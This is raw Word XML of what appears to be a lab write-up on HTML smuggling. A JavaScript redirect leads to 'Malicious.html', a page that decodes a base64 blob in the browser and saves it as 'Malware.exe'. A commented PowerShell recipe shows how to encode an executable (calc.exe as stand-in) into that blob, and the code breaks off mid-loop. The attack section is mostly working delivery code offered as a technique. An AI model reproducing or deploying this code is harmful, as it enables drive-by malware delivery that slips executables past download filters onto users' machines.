          <w:p w14:paraId="4A8DD943" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ED4BC67" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>javascript</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> code has been mentioned </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>below :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="024C85D3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CB6B14A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="16"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="DCDCAA"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>redirect</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17BC4239" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="28" w:line="274" w:lineRule="auto"/>
              <w:ind w:right="4684"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">{ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>window</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>location</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href</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>"Malicious.html"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>; }</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C454320" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="239" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">This code redirects to Malicious.html page which automatically executes the Malware Script and Malware gets downloaded </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="782CE1DD" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CE1C0D0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">The code for Malware Script is mentioned </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>below :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BAECA33" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B8FC9E3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="16"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>&lt;!</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>DOCTYPE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>html</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0640EE9F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="16"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>html</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>lang</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>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en</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D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="040F05A2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="14"/>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&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F57D059" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="16"/>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title</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Document</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>title</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76E0BE85" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="16"/>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&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26F9EC81" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="16"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CF2D1D3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="14"/>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D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A6877FF" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="16"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>&lt;!--</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> PS C:\Users\VAIBHAV BAKSHI&gt; $base64string = </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44D06480" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="275" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>[Convert</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>]::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>ToBase64String([IO.File]::ReadAllBytes('C:\Windows\System32\calc.exe' ))</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09AC6DCD" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="14"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>PS C:\Users\VAIBHAV BAKSHI&gt; $base64string | Out-File temporary.log</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36FD0925" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="16"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>PS C:\Users\VAIBHAV BAKSHI&gt; code .\temporary.log --&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2454A8B5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:ind w:right="1223"/>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script</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9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>filename</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>"Malware.exe"</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filedata</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>"Malicious File data very large, generated with the         help of above commented code, So file data not mentioned here</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">" </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="DCDCAA"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>base64tobytes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>b64data</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binary_values</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="DCDCAA"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>atob</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>b64data</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binary_length</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>binary_values</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>length</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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bytes_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="4EC9B0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Uint8Array</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>binary_length</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">);             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C586C0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>for</w:t>
            </w:r>
            <w:r>
